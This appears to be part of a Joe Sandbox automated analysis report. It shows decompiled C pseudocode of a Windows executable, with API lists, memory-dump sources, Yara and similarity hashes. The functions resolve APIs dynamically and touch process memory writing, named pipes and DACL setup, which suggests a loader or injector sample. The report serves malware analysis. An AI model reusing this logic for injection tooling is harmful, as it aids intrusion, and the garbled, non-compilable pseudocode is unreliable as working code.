                                                                                                                                                                                        				if (_t100 - 0x1388 >= 0) goto 0xcef2376c;
                                                                                                                                                                                        				goto 0xcef237a3;
                                                                                                                                                                                        				if (_t100 - 0x1b58 >= 0) goto 0xcef2377c;
                                                                                                                                                                                        				goto 0xcef237a3;
                                                                                                                                                                                        				if (_t100 - 0x1f40 >= 0) goto 0xcef2378c;
                                                                                                                                                                                        				goto 0xcef237a3;
                                                                                                                                                                                        				_t194 =  >=  ? 0xcef2bfc0 : 0xcef2bf90;
                                                                                                                                                                                        				if (_t100 + 0xffffe4a8 - 0x95f > 0) goto 0xcef237bf;
                                                                                                                                                                                        				if ( *0xcef2f054 - 0x53480000 <= 0) goto 0xcef237bf;
                                                                                                                                                                                        				_t195 = ( >=  ? 0xcef2bfc0 : 0xcef2bf90) + 0x30;
                                                                                                                                                                                        				_t172 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				 *((long long*)(_t246 + 0x38)) = _t172;
                                                                                                                                                                                        				_t173 =  *0xcef306b0; // 0x0
                                                                                                                                                                                        				 *(_t246 + 0x30) = _t173;
                                                                                                                                                                                        				if (_t173 == 0) goto 0xcef237f1;
                                                                                                                                                                                        				r8d = 4;
                                                                                                                                                                                        				E00007FF77FF7CEF21170(( >=  ? 0xcef2bfc0 : 0xcef2bf90) + 0x30, _t246 + 0x20, _t246 + 0x30, _t248);
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t243 + 0x77)) <= 0) goto 0xcef23a63;
                                                                                                                                                                                        				 *((long long*)(_t246 + 0x28)) = 0xcef30618;
                                                                                                                                                                                        				 *(_t246 + 0x30) = (_t173 << 4) +  *0xcef306a8;
                                                                                                                                                                                        				_t20 = _t243 + 0x17; // 0x7ff7cef22508
                                                                                                                                                                                        				_t176 = _t20;
                                                                                                                                                                                        				 *(_t246 + 0x20) = _t176;
                                                                                                                                                                                        				GetModuleHandleW(_t255);
                                                                                                                                                                                        				GetProcAddress(_t252);
                                                                                                                                                                                        				 *_t176();
                                                                                                                                                                                        				 *(_t243 - 0x79) = _t176;
                                                                                                                                                                                        				if (_t176 == 0) goto 0xcef23a54;
                                                                                                                                                                                        				r8d = 8;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(( >=  ? 0xcef2bfc0 : 0xcef2bf90) + 0x30, _t246 + 0x20, _t246 + 0x30, _t248) == 0) goto 0xcef23a4a;
                                                                                                                                                                                        				_t177 =  *((intOrPtr*)(_t246 + 0x38));
                                                                                                                                                                                        				 *((long long*)(_t246 + 0x28)) = _t177;
                                                                                                                                                                                        				goto 0xcef23a3a;
                                                                                                                                                                                        				if (1 == 0) goto 0xcef23a4a;
                                                                                                                                                                                        				_t29 = _t243 - 0x79; // 0x7ff7cef22478
                                                                                                                                                                                        				_t204 = _t29;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(( >=  ? 0xcef2bfc0 : 0xcef2bf90) + 0x30, _t204, _t246 + 0x20,  *_t195) == 0) goto 0xcef23a4a;
                                                                                                                                                                                        				_t30 = _t243 - 0x79; // 0x45158d480000e654
                                                                                                                                                                                        				_t250 =  *_t30;
                                                                                                                                                                                        				_t178 = _t177 + _t250;
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x39)) = _t178;
                                                                                                                                                                                        				 *((intOrPtr*)(_t243 - 0x21)) =  *((intOrPtr*)(_t178 + _t250));
                                                                                                                                                                                        				_t179 = _t178 + _t250;
                                                                                                                                                                                        				 *((intOrPtr*)(_t243 - 0x1d)) =  *((intOrPtr*)(_t178 + _t250));
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x29)) = _t179;
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x31)) = _t204 + _t250;
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x19)) =  *((intOrPtr*)(_t179 + _t250));
                                                                                                                                                                                        				 *(_t243 - 0x11) =  *((intOrPtr*)(_t179 + _t250));
                                                                                                                                                                                        				 *((long long*)(_t243 - 9)) =  *((intOrPtr*)(_t179 + _t250));
                                                                                                                                                                                        				 *((long long*)(_t243 - 1)) =  *((intOrPtr*)(_t179 + _t250));
                                                                                                                                                                                        				_t231 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				 *((long long*)(_t243 + 7)) = _t179 + _t250;
                                                                                                                                                                                        				E00007FF77FF7CEF2224C(_t195, _t204 + _t250, _t231, _t240, _t238);
                                                                                                                                                                                        				_t232 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				_t57 = _t243 - 0x29; // 0x244c8d48c1420f48
                                                                                                                                                                                        				E00007FF77FF7CEF2224C(_t195,  *_t57, _t232, _t240, _t240);
                                                                                                                                                                                        				_t233 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				_t58 = _t243 + 7; // 0xdd0d8b480853ff41
                                                                                                                                                                                        				E00007FF77FF7CEF2224C(_t195,  *_t58, _t233, _t240, _t242);
                                                                                                                                                                                        				 *(_t243 + 0x1f) =  *(_t243 + 0x1f) & 0x00000000;
                                                                                                                                                                                        				 *(_t243 + 0x27) =  *(_t243 + 0x27) & 0x00000000;
                                                                                                                                                                                        				_t63 = _t243 + 0x6f; // 0x7ff7cef22560
                                                                                                                                                                                        				_t64 = _t243 - 0x69; // 0x7ff7cef22488
                                                                                                                                                                                        				_t65 = _t243 - 0x59; // 0x7ff7cef22498
                                                                                                                                                                                        				 *(_t243 - 0x59) = _t63;
                                                                                                                                                                                        				_t67 = _t243 + 0x1f; // 0x7ff7cef22510
                                                                                                                                                                                        				r8d = 1;
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x51)) = _t67;
                                                                                                                                                                                        				_t69 = _t243 - 0x11; // 0x48000099a9058d48
                                                                                                                                                                                        				 *(_t243 - 0x11) =  *(_t243 - 0x11) & 0x00000000;
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x69)) =  *_t69 + 1;
                                                                                                                                                                                        				_t185 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				 *(_t243 - 0x61) = _t185;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t195, _t65, _t64, _t250) == 0) goto 0xcef239dd;
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x69)) =  *((long long*)(_t243 - 0x69)) - 1;
                                                                                                                                                                                        				GetModuleHandleW(??);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *_t185();
                                                                                                                                                                                        				 *(_t243 - 0x59) = _t185;
                                                                                                                                                                                        				if (_t185 == 0) goto 0xcef239dd;
                                                                                                                                                                                        				_t80 = _t243 - 0x69; // 0x7ff7cef22488
                                                                                                                                                                                        				_t81 = _t243 - 0x59; // 0x7ff7cef22498
                                                                                                                                                                                        				r8d = 8 + _t185 * 4;
                                                                                                                                                                                        				 *(_t243 - 0x11) = _t185;
                                                                                                                                                                                        				E00007FF77FF7CEF21170(_t195, _t81, _t80, _t250);
                                                                                                                                                                                        				_t83 = _t243 - 0x49; // 0x7ff7cef224a8
                                                                                                                                                                                        				E00007FF77FF7CEF23AE8(_t195, _t83, _t256, _t240, _t243);
                                                                                                                                                                                        				_t84 = _t243 - 0x31; // 0x9b50058d4800
                                                                                                                                                                                        				if ( *((intOrPtr*)( *_t84 + 8)) == 0) goto 0xcef239fe;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				_t86 = _t243 - 0x29; // 0x244c8d48c1420f48
                                                                                                                                                                                        				if ( *((intOrPtr*)( *_t86 + 8)) == 0) goto 0xcef23a11;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				_t88 = _t243 + 7; // 0xdd0d8b480853ff41
                                                                                                                                                                                        				if ( *((intOrPtr*)( *_t88 + 8)) == 0) goto 0xcef23a24;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				_t90 = _t243 - 0x11; // 0x48000099a9058d48
                                                                                                                                                                                        				if ( *_t90 == 0) goto 0xcef23a33;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				_t91 = _t243 - 0x79; // 0x45158d480000e654
                                                                                                                                                                                        				_t219 =  *((intOrPtr*)( *_t91));
                                                                                                                                                                                        				 *(_t246 + 0x20) = _t219;
                                                                                                                                                                                        				if (_t219 !=  *(_t246 + 0x30)) goto 0xcef23887;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				_t95 = _t243 + 0x77; // 0x7af815ff0000
                                                                                                                                                                                        				if (1 -  *_t95 < 0) goto 0xcef23803;
                                                                                                                                                                                        				_t96 = _t243 + 0x7f; // 0x48000096b9158d48
                                                                                                                                                                                        				r12d =  *_t96;
                                                                                                                                                                                        				return r12d;
                                                                                                                                                                                        			}
































                                                                                                                                                                                        0x7ff7cef238f3
                                                                                                                                                                                        0x7ff7cef238fe
                                                                                                                                                                                        0x7ff7cef23909
                                                                                                                                                                                        0x7ff7cef2390d
                                                                                                                                                                                        0x7ff7cef23917
                                                                                                                                                                                        0x7ff7cef2391b
                                                                                                                                                                                        0x7ff7cef23920
                                                                                                                                                                                        0x7ff7cef23927
                                                                                                                                                                                        0x7ff7cef2392b
                                                                                                                                                                                        0x7ff7cef23930
                                                                                                                                                                                        0x7ff7cef23937
                                                                                                                                                                                        0x7ff7cef2393b
                                                                                                                                                                                        0x7ff7cef23940
                                                                                                                                                                                        0x7ff7cef23944
                                                                                                                                                                                        0x7ff7cef23949
                                                                                                                                                                                        0x7ff7cef2394d
                                                                                                                                                                                        0x7ff7cef23951
                                                                                                                                                                                        0x7ff7cef23955
                                                                                                                                                                                        0x7ff7cef23959
                                                                                                                                                                                        0x7ff7cef2395d
                                                                                                                                                                                        0x7ff7cef23963
                                                                                                                                                                                        0x7ff7cef23967
                                                                                                                                                                                        0x7ff7cef2396b
                                                                                                                                                                                        0x7ff7cef23973
                                                                                                                                                                                        0x7ff7cef23977
                                                                                                                                                                                        0x7ff7cef2397e
                                                                                                                                                                                        0x7ff7cef23989
                                                                                                                                                                                        0x7ff7cef2398f
                                                                                                                                                                                        0x7ff7cef239a1
                                                                                                                                                                                        0x7ff7cef239b1
                                                                                                                                                                                        0x7ff7cef239be
                                                                                                                                                                                        0x7ff7cef239c0
                                                                                                                                                                                        0x7ff7cef239c7
                                                                                                                                                                                        0x7ff7cef239c9
                                                                                                                                                                                        0x7ff7cef239cd
                                                                                                                                                                                        0x7ff7cef239d1
                                                                                                                                                                                        0x7ff7cef239d4
                                                                                                                                                                                        0x7ff7cef239d8
                                                                                                                                                                                        0x7ff7cef239dd
                                                                                                                                                                                        0x7ff7cef239e4
                                                                                                                                                                                        0x7ff7cef239e9
                                                                                                                                                                                        0x7ff7cef239f6
                                                                                                                                                                                        0x7ff7cef239f8
                                                                                                                                                                                        0x7ff7cef239fe
                                                                                                                                                                                        0x7ff7cef23a09
                                                                                                                                                                                        0x7ff7cef23a0b
                                                                                                                                                                                        0x7ff7cef23a11
                                                                                                                                                                                        0x7ff7cef23a1c
                                                                                                                                                                                        0x7ff7cef23a1e
                                                                                                                                                                                        0x7ff7cef23a24
                                                                                                                                                                                        0x7ff7cef23a2b
                                                                                                                                                                                        0x7ff7cef23a2d
                                                                                                                                                                                        0x7ff7cef23a33
                                                                                                                                                                                        0x7ff7cef23a37
                                                                                                                                                                                        0x7ff7cef23a3a
                                                                                                                                                                                        0x7ff7cef23a44
                                                                                                                                                                                        0x7ff7cef23a4e
                                                                                                                                                                                        0x7ff7cef23a56
                                                                                                                                                                                        0x7ff7cef23a59
                                                                                                                                                                                        0x7ff7cef23a5f
                                                                                                                                                                                        0x7ff7cef23a5f
                                                                                                                                                                                        0x7ff7cef23a7c

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleLocalModuleProc$File$Pointer$CreateMemoryProcessWrite
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 2588141871-3502785670
                                                                                                                                                                                        • Opcode ID: ff52a427bf4d7faa984fc2a906d94663f66b57d29589e4babc107cc92fa9e624
                                                                                                                                                                                        • Instruction ID: c87f7b583597015ee5ad30f127030c90c77b7334375b961e559e3547b4ec9e63
                                                                                                                                                                                        • Opcode Fuzzy Hash: ff52a427bf4d7faa984fc2a906d94663f66b57d29589e4babc107cc92fa9e624
                                                                                                                                                                                        • Instruction Fuzzy Hash: F1B12A76B09B068AEB94EF64E4402ACB3A5FB88768F900036DE4D67758DF3CE505C764
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DescriptorHeapSecurity$AddressAllocCreateDaclFileHandleInitializeModuleNamedPipeProcProcessSleepWait
                                                                                                                                                                                        • String ID: GetLastError$kernel32
                                                                                                                                                                                        • API String ID: 2144717574-498319287
                                                                                                                                                                                        • Opcode ID: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                                                                                                                                                                        • Instruction ID: 02006d1a9caa324a050e5e424a4987f93f0d5999280ae6fb8428bce986c1923f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B316131A08A4282FB90EF25E414769B3A0FB84B74F954634DA6D5B7E8DF7CD449CB20
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 31%
                                                                                                                                                                                        			E00007FF77FF7CEF21F84(void* __edx, long long __rbx, intOrPtr* __rcx, long long __rdi, signed int __rsi) {
                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                        				signed int _t82;
                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                        				long long _t84;
                                                                                                                                                                                        				intOrPtr* _t105;
                                                                                                                                                                                        				signed int _t107;
                                                                                                                                                                                        				WCHAR* _t109;
                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                        				void* _t112;
                                                                                                                                                                                        				long long _t115;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t107 = __rsi;
                                                                                                                                                                                        				_t84 = __rbx;
                                                                                                                                                                                        				_t77 = _t112;
                                                                                                                                                                                        				 *((long long*)(_t77 + 0x10)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t77 + 0x18)) = __rsi;
                                                                                                                                                                                        				 *((long long*)(_t77 + 0x20)) = __rdi;
                                                                                                                                                                                        				_t110 = _t77 - 0x5f;
                                                                                                                                                                                        				_t105 = __rcx;
                                                                                                                                                                                        				 *(_t110 - 9) =  *(_t110 - 9) & __rsi;
                                                                                                                                                                                        				 *(_t110 + 7) =  *(_t110 + 7) & __rsi;
                                                                                                                                                                                        				 *(_t110 - 0x19) = _t110 + 0x17;
                                                                                                                                                                                        				_t11 = _t107 + 0x40; // 0x40
                                                                                                                                                                                        				r8d = _t11;
                                                                                                                                                                                        				 *((long long*)(_t110 - 0x11)) = 0xcef30618;
                                                                                                                                                                                        				 *((long long*)(_t110 - 1)) = 0xcef30618;
                                                                                                                                                                                        				 *((long long*)(_t110 + 0xf)) =  *((intOrPtr*)(__rcx + 8));
                                                                                                                                                                                        				_t45 = E00007FF77FF7CEF21170(__rbx, _t110 - 0x19, __rcx, _t115); // executed
                                                                                                                                                                                        				if (_t45 == 0) goto 0xcef220d1;
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t110 + 0x17)) != 0x5a4d) goto 0xcef220d1;
                                                                                                                                                                                        				_t82 =  *((intOrPtr*)(_t110 + 0x53)) +  *_t105;
                                                                                                                                                                                        				 *(_t110 + 7) = _t82;
                                                                                                                                                                                        				GetModuleHandleW(_t109);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				_t20 = _t107 + 0x18; // 0x18
                                                                                                                                                                                        				 *_t82();
                                                                                                                                                                                        				 *(_t110 - 0x19) = _t82;
                                                                                                                                                                                        				if (_t82 == 0) goto 0xcef220d1;
                                                                                                                                                                                        				r8d = _t20; // executed
                                                                                                                                                                                        				E00007FF77FF7CEF21170(_t84, _t110 - 0x19, _t110 + 7, _t115); // executed
                                                                                                                                                                                        				_t83 =  *(_t110 - 0x19);
                                                                                                                                                                                        				_t26 = _t84 + 0x44; // 0x14c
                                                                                                                                                                                        				r11d = _t26;
                                                                                                                                                                                        				_t27 = _t84 - 0x10; // 0xf8
                                                                                                                                                                                        				r9d = _t27;
                                                                                                                                                                                        				_t61 =  ==  ? r9d : 0x108;
                                                                                                                                                                                        				GetModuleHandleW(??);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *_t83();
                                                                                                                                                                                        				 *(_t110 - 9) = _t83;
                                                                                                                                                                                        				if (_t83 == 0) goto 0xcef220ae;
                                                                                                                                                                                        				r8d =  ==  ? r9d : 0x108; // executed
                                                                                                                                                                                        				_t54 = E00007FF77FF7CEF21170(_t84, _t110 - 9, _t110 + 7, _t115); // executed
                                                                                                                                                                                        				if (_t54 == 0) goto 0xcef220a4;
                                                                                                                                                                                        				goto 0xcef220b2;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				if (_t54 == 0) goto 0xcef220d1;
                                                                                                                                                                                        				 *(_t105 + 0x14) =  *( *((intOrPtr*)(_t110 + 0x67)) + 8);
                                                                                                                                                                                        				_t58 = LocalFree(??);
                                                                                                                                                                                        				goto 0xcef220d5;
                                                                                                                                                                                        				 *(_t105 + 0x14) =  *(_t105 + 0x14) & 0x00000000;
                                                                                                                                                                                        				return _t58;
                                                                                                                                                                                        			}

















                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc$FreeLocal$FilePointer$MemoryProcessWrite
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 3806729184-3502785670
                                                                                                                                                                                        • Opcode ID: 7e10f62cf0ceab0a247abe0a49262679ca8fba5d86696112e243d33c207d7ff0
                                                                                                                                                                                        • Instruction ID: b597310b63e838112ebcf2866e67e3e3e3d4126cac28a8b062e71d050e6aaf87
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e10f62cf0ceab0a247abe0a49262679ca8fba5d86696112e243d33c207d7ff0
                                                                                                                                                                                        • Instruction Fuzzy Hash: F6412E32B05B069AEB50EF61D4405ACB374FB88B58B844435CE4D67B59EF38EA59C3A0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                        			E00007FF77FF7CEF243C4(long long __rbx, signed int _a8, long long _a16) {
                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                        				long long _t74;
                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				long long _t87;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t75 = __rbx;
                                                                                                                                                                                        				_a16 = __rbx;
                                                                                                                                                                                        				if ( *0x7FF7CEF20000 == 0x5a4d) goto 0xcef243e0;
                                                                                                                                                                                        				goto 0xcef24418;
                                                                                                                                                                                        				_t74 =  *0x7FF7CEF2003C + 0x7ff7cef20000;
                                                                                                                                                                                        				if ( *_t74 != 0x4550) goto 0xcef243dc;
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t74 + 0x18)) != 0x20b) goto 0xcef243dc;
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t74 + 0x84)) - 0xe <= 0) goto 0xcef24418;
                                                                                                                                                                                        				_t40 = 0 |  *((intOrPtr*)(_t74 + 0xf8)) != 0x00000000;
                                                                                                                                                                                        				_a8 = _t40;
                                                                                                                                                                                        				_t15 = E00007FF77FF7CEF26A00(_t74); // executed
                                                                                                                                                                                        				if (_t15 != 0) goto 0xcef24447;
                                                                                                                                                                                        				if ( *0xcef2f510 == 2) goto 0xcef24433;
                                                                                                                                                                                        				E00007FF77FF7CEF25E60();
                                                                                                                                                                                        				E00007FF77FF7CEF25C00(0x1c,  *0xcef2f510 - 2, __rbx, _t81, _t82);
                                                                                                                                                                                        				E00007FF77FF7CEF25850(); // executed
                                                                                                                                                                                        				_t18 = E00007FF77FF7CEF253DC(_t74); // executed
                                                                                                                                                                                        				if (_t18 != 0) goto 0xcef24472;
                                                                                                                                                                                        				if ( *0xcef2f510 == 2) goto 0xcef2445e;
                                                                                                                                                                                        				E00007FF77FF7CEF25E60();
                                                                                                                                                                                        				E00007FF77FF7CEF25C00(0x10,  *0xcef2f510 - 2, _t75, _t81, _t82);
                                                                                                                                                                                        				E00007FF77FF7CEF25850();
                                                                                                                                                                                        				E00007FF77FF7CEF26990(_t75);
                                                                                                                                                                                        				_t22 = E00007FF77FF7CEF266BC(_t74, _t75, _t78, _t80); // executed
                                                                                                                                                                                        				if (_t22 >= 0) goto 0xcef2448b;
                                                                                                                                                                                        				E00007FF77FF7CEF25BAC(0x1b, _t75, _t86);
                                                                                                                                                                                        				GetCommandLineW();
                                                                                                                                                                                        				 *0xcef30918 = _t74; // executed
                                                                                                                                                                                        				E00007FF77FF7CEF26634(_t55, _t74, _t75, _t81, _t82); // executed
                                                                                                                                                                                        				 *0xcef2f508 = _t74;
                                                                                                                                                                                        				if (E00007FF77FF7CEF26544(_t75, _t86) >= 0) goto 0xcef244b7;
                                                                                                                                                                                        				_t27 = E00007FF77FF7CEF25BAC(8, _t75, _t86); // executed
                                                                                                                                                                                        				_t28 = E00007FF77FF7CEF26274(_t27, _t75, _t80, _t81, _t82); // executed
                                                                                                                                                                                        				if (_t28 >= 0) goto 0xcef244ca;
                                                                                                                                                                                        				E00007FF77FF7CEF25BAC(9, _t75, _t86);
                                                                                                                                                                                        				_t30 = E00007FF77FF7CEF25934(1, _t75, _t86); // executed
                                                                                                                                                                                        				if (_t30 == 0) goto 0xcef244df;
                                                                                                                                                                                        				E00007FF77FF7CEF25BAC(_t30, _t75, _t86);
                                                                                                                                                                                        				_t87 =  *0xcef2f570; // 0x2152300
                                                                                                                                                                                        				 *0xcef2f578 = _t87;
                                                                                                                                                                                        				_t79 =  *0xcef2f558; // 0x2152250
                                                                                                                                                                                        				_t51 =  *0xcef2f54c; // 0x2, executed
                                                                                                                                                                                        				_t32 = E00007FF77FF7CEF2245C(_t51, _t54, _t74, _t79, _t88); // executed
                                                                                                                                                                                        				_v24 = _t32;
                                                                                                                                                                                        				if (_t40 != 0) goto 0xcef24510;
                                                                                                                                                                                        				E00007FF77FF7CEF25B74(_t75, _t79, _t87); // executed
                                                                                                                                                                                        				_t34 = E00007FF77FF7CEF25B8C(_t75, _t79, _t87);
                                                                                                                                                                                        				if (_a8 != 0) goto 0xcef24528;
                                                                                                                                                                                        				E00007FF77FF7CEF25B80(_t75, _t79, _t87);
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				E00007FF77FF7CEF25B9C(_t75, _t87);
                                                                                                                                                                                        				return _t34;
                                                                                                                                                                                        			}



























                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
• Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2949660345-0
                                                                                                                                                                                        • Opcode ID: 1c5e4fb2d6c217db383d5a7a2bb8b8b182df4c96f6030af45334dbea844a78b7
                                                                                                                                                                                        • Instruction ID: 34145323ff20688f3f5cc9bb5f4e1e17ba1b9207ff3d382994cd9c66221113e2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c5e4fb2d6c217db383d5a7a2bb8b8b182df4c96f6030af45334dbea844a78b7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 11316361E0C64386FAD17FB0A4522B9E292AF80375FD14039D94D762D7EFACB8408672
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                                        			E00007FF77FF7CEF2326C(signed int __eax, void* __esi, void* __r9, intOrPtr _a8, char _a16, signed int _a24, void* _a32) {
                                                                                                                                                                                        				long long _v64;
                                                                                                                                                                                        				long long _v72;
                                                                                                                                                                                        				char _v80;
                                                                                                                                                                                        				intOrPtr _v88;
                                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                                        				intOrPtr _v96;
                                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                                        				char _v120;
                                                                                                                                                                                        				long long _v136;
                                                                                                                                                                                        				long long _v144;
                                                                                                                                                                                        				long long _v152;
                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                        				intOrPtr _t72;
